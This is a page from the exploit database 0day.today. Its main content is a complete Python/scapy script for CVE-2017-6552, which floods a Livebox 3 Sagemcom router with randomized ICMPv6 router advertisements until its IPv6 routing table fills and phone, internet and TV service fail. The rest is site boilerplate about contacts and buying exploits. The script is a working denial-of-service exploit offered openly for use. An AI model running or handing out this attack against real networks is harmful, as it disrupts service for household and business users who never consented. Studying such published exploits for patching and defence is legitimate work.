0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service Exploit

Author

Quentin Olagne

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

CVE

Platform

#!/usr/bin/python
 
# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552
 
'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes. 
An attacker can exploit this issue to render the affected system 
unresponsive, resulting in a denial-of-service condition for Phone, 
Internet and TV services.
 
Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware. 
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin 
livebox web UI, don't know if it's been implemented. 
 
'''
 
from scapy.all import *
import time
import threading
 
start_time = time.time()
 
def printit():
    threading.Timer(5.0, printit).start()
    interval = time.time() - start_time
    print 'Total time in seconds:', interval, '\n'
 
printit()
 
packet = Ether() \
    /IPv6() \
    /ICMPv6ND_RA() \
    /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
    /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
 
try:
    sendp(packet,loop=1)
except KeyboardInterrupt:
        stored_exception=sys.exc_info()
except:
    pass
 
print "Goodbye"

#  0day.today [2024-12-23]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service Exploit

Report Error

Report Error